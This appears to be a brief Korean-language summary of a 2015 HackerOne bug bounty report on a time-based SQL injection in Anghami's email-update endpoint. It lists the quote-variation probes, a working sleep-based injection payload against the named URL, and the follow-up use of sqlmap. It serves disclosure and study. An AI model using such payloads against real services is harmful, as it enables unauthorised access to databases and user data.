hackerone-anghami-2015-10-n-86468

[https://www.anghami.com/updatemailinfo/] Sql Injection

Time based SLQi 할 수 있었다.

validateemail=sdfsdf@sdfsd.com&phoneormail= => Please Check Your email to verify 에러가 뜸
validateemail=sdfsdf@sdfsd.com'&phoneormail= => 메시지 사라짐
validateemail=sdfsdf@sdfsd.com''&phoneormail= => Please Check Your email to verify 에러가 뜸
validateemail=test@yopmail.com' or sleep(5) #&sid=0&lang=en&phoneormail= => server timeout

서버 타임아웃이 일어나는 것을 보고 SQLi가 가능했음을 알 수 있다.

이 페이로드를 기반으로 sqlmap을 돌려 DB 버전을 얻어 검증했다.

tags: wstg-inpv-05, bughunting, sqli, time-based-sqli, web hacking, severity none